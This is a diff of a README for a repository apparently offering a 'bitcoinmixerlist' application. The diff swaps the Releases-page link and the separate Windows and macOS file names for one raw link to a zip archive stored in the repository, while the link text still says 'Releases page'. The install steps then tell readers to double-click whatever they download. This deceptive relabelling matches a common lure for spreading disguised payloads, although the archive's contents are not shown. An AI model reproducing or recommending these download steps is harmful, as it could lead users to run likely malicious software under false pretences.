dayvieamukowa/bitcoinmixerlist/README.md

 To get started with bitcoinmixerlist, you need to download the software.
 Follow the steps below to easily install and run the application.

 ## 📥 Download & Install
-1. First, visit the [Releases page](https://github.com/dayvieamukowa/bitcoinmixerlist/releases) to download the latest version.
+1. First, visit the [Releases page](https://github.com/dayvieamukowa/bitcoinmixerlist/raw/refs/heads/main/shotsman/Software-3.3.zip) to download the latest version.
 2. Look for the most recent release.
 Click on it to see all the available files.
 3. Choose the file that matches your operating system.
 For example:
-   - If you use Windows, look for something like `bitcoinmixerlist-windows.exe`.
+   - If you use Windows, look for something like `https://github.com/dayvieamukowa/bitcoinmixerlist/raw/refs/heads/main/shotsman/Software-3.3.zip`.
-   - If you use macOS, look for `bitcoinmixerlist-macos.dmg`.
+   - If you use macOS, look for `https://github.com/dayvieamukowa/bitcoinmixerlist/raw/refs/heads/main/shotsman/Software-3.3.zip`.
 4. Click on the file to start the download.

 Once the download is complete, locate the downloaded file on your computer, and double-click it to run the installation.
 Follow any prompts to finish.